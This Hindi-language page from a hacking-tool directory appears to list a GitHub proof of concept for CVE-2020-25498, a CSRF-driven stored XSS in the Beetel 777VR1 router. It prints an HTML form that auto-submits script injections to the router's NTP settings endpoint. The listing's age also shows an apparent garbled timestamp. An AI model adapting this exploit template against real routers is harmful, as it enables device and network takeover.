Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25498 — Beetel 777VR1 राउटर में CSRF के माध्यम से संग्रहीत XSS | Kitploit
उपकरण/GitHubGitHub/the-girl-who-lived/cve-2020-25498
फ़िशिंग उपकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Beetel 777VR1 राउटर में CSRF के माध्यम से संग्रहीत XSS

रिपॉजिटरी देखें
335 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-25498: Beetel 777VR1 राउटर में CSRF के माध्यम से संग्रहीत XSS

भेद्यता विवरण

यह पहचाना गया है कि असुरक्षित एंडपॉइंट में सर्वर-साइड इनपुट सत्यापन नहीं है और किसी भी दुर्भावनापूर्ण स्क्रिप्ट इंजेक्शन के लिए क्लाइंट-साइड फ़िल्टरिंग का अभाव है। एक हमलावर इस भेद्यता का उपयोग एंडपॉइंट में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करने के लिए कर सकता है, और जब भी कोई उपयोगकर्ता असुरक्षित एंडपॉइंट खोलता है तो स्क्रिप्ट सक्रिय हो जाती है। हमलावर डिवाइस पर कब्ज़ा करने और अंततः नेटवर्क पर कब्ज़ा करने के लिए, CSRF के माध्यम से एडमिन मॉड्यूल में XSS निष्पादित करने हेतु POST अनुरोध पेलोड के साथ एक दुर्भावनापूर्ण URL भेज सकता है।

शोधकर्ता: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE लिंक: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट:

CSRF HTML कोड:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. सिस्टम टाइम कॉन्फ़िगरेशन मॉड्यूल में NTP सर्वर नाम

पैरामीटर: सर्वर नाम

प्रूफ ऑफ कॉन्सेप्ट वीडियो:

2. फ़ायरवॉल मॉड्यूल में URL फ़िल्टर एंडपॉइंट

पैरामीटर: कीवर्ड

प्रूफ ऑफ कॉन्सेप्ट वीडियो:

टूल डाउनलोड करें